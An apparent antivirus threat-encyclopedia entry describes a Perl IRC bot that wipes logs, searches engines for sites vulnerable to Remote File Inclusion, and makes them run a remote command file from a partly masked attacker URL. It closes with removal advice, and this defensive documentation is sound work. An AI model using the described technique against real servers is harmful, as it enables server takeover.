| Detection added |
Oct 05 2007 16:47 GMT |
| Update released |
Oct 05 2007 18:11 GMT |
| Description added |
Aug 04 2008 |
| Behavior |
Hacker Tool |
This malicious program is a hacking utility. It is a Perl script. The size
of infected files may vary from 12KB to 69KB.
This script is an IRC bot which is used to search for Remote File Inclusion
(RFI) vulnerabilities.
Depending on the commands received, the bot can:
- wipe log files
- search for sites with RFI vulnerabilities. In order to find a
site, the bot is given a keyword. It then uses the keyword with the following
search services:
http://www.google.nl
http://busca.uol.com.br
http://www.alltheweb.com
http://it.ask.com
http://search.aol.com
http://suche.fireball.de
http://search.lycos.com
http://arianna.libero.it
http://search.yahoo.com
http://search.live.com
If sites are found which contain the substrings "buterfly" and "uid=" in the
address, the malicious program ctreats a request which redirects the address
to the following link:
http://linknet*****.com/source/cmd.txt?
The contents of this file will then be run on the site's web server. This
provides the remote malicious user with access to the server.
The script also contains the following string:
Yogya Ceria Scaner Bot Created By eviL-Zone -= evil =-
If your computer does not have an up-to-date antivirus, or does not have an
antivirus solution at all, follow the instructions below to delete the malicious
program:
- Delete the original malicious program file (the location will
depend on how the program originally penetrated the victim machine).
- Update your antivirus databases and perform a full scan of the
computer (download a trial version of Kaspersky Anti-Virus).
